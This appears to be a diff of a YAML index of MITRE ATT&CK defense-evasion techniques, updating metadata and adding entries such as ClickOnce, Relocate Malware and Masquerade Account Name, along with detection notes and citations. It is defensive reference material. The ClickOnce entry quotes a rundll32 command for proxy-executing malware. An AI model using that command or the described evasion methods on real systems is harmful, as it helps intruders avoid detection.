@@ -11441,20 +11586,11 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1578/005
         external_id: T1578.005
-      - source_name: Microsoft Subscription Hijacking 2022
-        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
-          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
-        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
       - source_name: Microsoft Cryptojacking 2023
         description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
           Understanding and defending against cloud compute resource abuse. Retrieved
           September 5, 2023.'
         url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
-      - source_name: Microsoft Peach Sandstorm 2023
-        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
-          password spray campaigns enable intelligence collection at high-value targets.
-          Retrieved September 18, 2023.
-        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
       - source_name: Microsoft Azure Policy
         description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
           Retrieved September 5, 2023.
@@ -11463,11 +11599,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.008:
     technique:
-      modified: '2024-04-12T21:13:56.431Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Impair Defenses: Disable Cloud Logs'
       description: |-
         An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -11476,6 +11611,7 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -11485,6 +11621,7 @@ defense-evasion:
       - Janantha Marasinghe
       - Matt Snyder, VMware
       - Joe Gumke, U.S. Bank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
         for: <code>StopLogging</code> and <code>DeleteTrail</code>.(Citation: Stopping
@@ -11496,13 +11633,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      - Office 365
-      x_mitre_version: '2.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'User Account: User Account Modification'
@@ -11547,9 +11684,6 @@ defense-evasion:
         url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.008
     atomic_tests:
     - name: Office 365 - Exchange Audit Log Disabled
@@ -11718,18 +11852,140 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.003
     atomic_tests: []
+  T1127.002:
+    technique:
+      modified: '2024-10-17T18:50:41.474Z'
+      name: ClickOnce
+      description: |-
+        Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+        Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+        ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+        Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+        Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Wirapong Petshagun
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Metadata'
+      - 'Module: Module Load'
+      x_mitre_system_requirements:
+      - ".NET Framework"
+      type: attack-pattern
+      id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+      created: '2024-09-09T14:39:28.637Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1127/002
+        external_id: T1127.002
+      - source_name: LOLBAS /Dfsvc.exe
+        description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+      - source_name: Microsoft Learn ClickOnce
+        description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+          Retrieved September 9, 2024.
+        url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+      - source_name: SpectorOps Medium ClickOnce
+        description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+          (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+        url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+      - source_name: NetSPI ClickOnce
+        description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+          Love Story. Retrieved September 9, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+      - source_name: Burke/CISA ClickOnce Paper
+        description: William J. Burke IV. (n.d.). Appref-ms Abuse for  Code Execution
+          & C2. Retrieved September 9, 2024.
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+      - source_name: Burke/CISA ClickOnce BlackHat
+        description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+          IN: When .appref-ms abuse is operating as intended. Retrieved September
+          9, 2024.'
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1070.010:
+    technique:
+      modified: '2024-10-13T15:48:46.391Z'
+      name: Relocate Malware
+      description: |-
+        Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+        Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+        Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Matt Anderson, @‌nosecurething, Huntress
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+      created: '2024-05-31T11:07:57.406Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/010
+        external_id: T1070.010
+      - source_name: Latrodectus APR 2024
+        description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+          (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+          31, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+      - source_name: DFIR Report Trickbot June 2023
+        description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+          Retrieved May 31, 2024.
+        url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -11762,10 +12018,9 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -11802,40 +12057,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.002:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
-      type: attack-pattern
-      created: '2020-05-14T14:45:15.978Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.002
-        url: https://attack.mitre.org/techniques/T1578/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.416Z'
       name: Create Cloud Instance
       description: |-
         An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -11844,20 +12069,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the creation of an instance in the <code>RunInstances</code> event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances create</code> to create a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Creation'
       - 'Instance: Instance Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+      created: '2020-05-14T14:45:15.978Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/002
+        external_id: T1578.002
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.009:
     technique:
@@ -11887,7 +12142,7 @@ defense-evasion:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -11930,8 +12185,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1601.001:
     technique:
@@ -11978,7 +12231,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:46.560Z'
       name: Patch System Image
       description: "Adversaries may modify the operating system of a network device
         to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -12044,12 +12297,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T22:30:01.227Z'
       name: Clear Persistence
       description: |-
         Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -12104,33 +12355,84 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
-  T1556.001:
+  T1036.010:
     technique:
-      x_mitre_platforms:
-      - Windows
+      modified: '2024-10-17T15:20:36.705Z'
+      name: Masquerade Account Name
+      description: "Adversaries may match or approximate the names of legitimate accounts
+        to make newly created ones appear benign. This will typically occur during
+        [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+        may also be renamed at a later date. This may also coincide with [Account
+        Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+        deletes an account before re-creating one with the same name.(Citation: Huntress
+        MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+        such as those associated with legitimate software, data backups, or container
+        cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+        Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+        such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+        2024) Sometimes adversaries may model account names off of those already existing
+        in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+        \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+        which describes impersonating specific trusted individuals or organizations,
+        rather than user or service account names.  "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Menachem Goldstein
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - SaaS
+      - IaaS
+      - Containers
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Creation'
       type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
+      id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+      created: '2024-08-05T21:39:16.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1036/010
+        external_id: T1036.010
+      - source_name: Elastic CUBA Ransomware 2022
+        description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+          Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+          August 5, 2024.
+        url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+      - source_name: Invictus IR Cloud Ransomware 2024
+        description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+          August 5, 2024.
+        url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+      - source_name: Huntress MOVEit 2023
+        description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+          CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+        url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+      - source_name: Aquasec Kubernetes Attack 2023
+        description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+          Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+          2023.
+        url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.001:
+    technique:
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -12151,6 +12453,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -12165,22 +12468,42 @@ defense-evasion:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.006:
     technique:
-      modified: '2023-07-14T14:01:41.475Z'
+      modified: '2024-09-12T19:12:13.006Z'
       name: HTML Smuggling
       description: |-
         Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)
@@ -12238,48 +12561,17 @@ defense-evasion:
         url: https://www.menlosecurity.com/blog/new-attack-alert-duri
       - source_name: nccgroup Smuggling HTA 2017
         description: Warren, R. (2017, August 8). Smuggling HTA files in Internet
-          Explorer/Edge. Retrieved May 20, 2021.
-        url: https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/
+          Explorer/Edge. Retrieved September 12, 2024.
+        url: https://www.nccgroup.com/us/research-blog/smuggling-hta-files-in-internet-exploreredge/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1027.006
     atomic_tests: []
   T1556.005:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
-      type: attack-pattern
-      created: '2022-01-13T20:02:28.349Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.005
-        url: https://attack.mitre.org/techniques/T1556/005
-      - source_name: store_pwd_rev_enc
-        url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
-        description: Microsoft. (2021, October 28). Store passwords using reversible
-          encryption. Retrieved January 3, 2022.
-      - source_name: how_pwd_rev_enc_1
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
-        description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
-          encryption: how it works (part 1). Retrieved November 17, 2021.'
-      - source_name: how_pwd_rev_enc_2
-        url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
-        description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
-          encryption: how it works (part 2). Retrieved November 17, 2021.'
-      - source_name: dump_pwd_dcsync
-        url: https://adsecurity.org/?p=2053
-        description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
-          All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-26T15:40:31.871Z'
       name: Reversible Encryption
       description: |-
         An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
@@ -12301,6 +12593,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor property changes in Group Policy: <code>Computer
         Configuration\\Windows Settings\\Security Settings\\Account Policies\\Password
         Policy\\Store passwords using reversible encryption</code>. By default, the
@@ -12311,23 +12604,50 @@ defense-evasion:
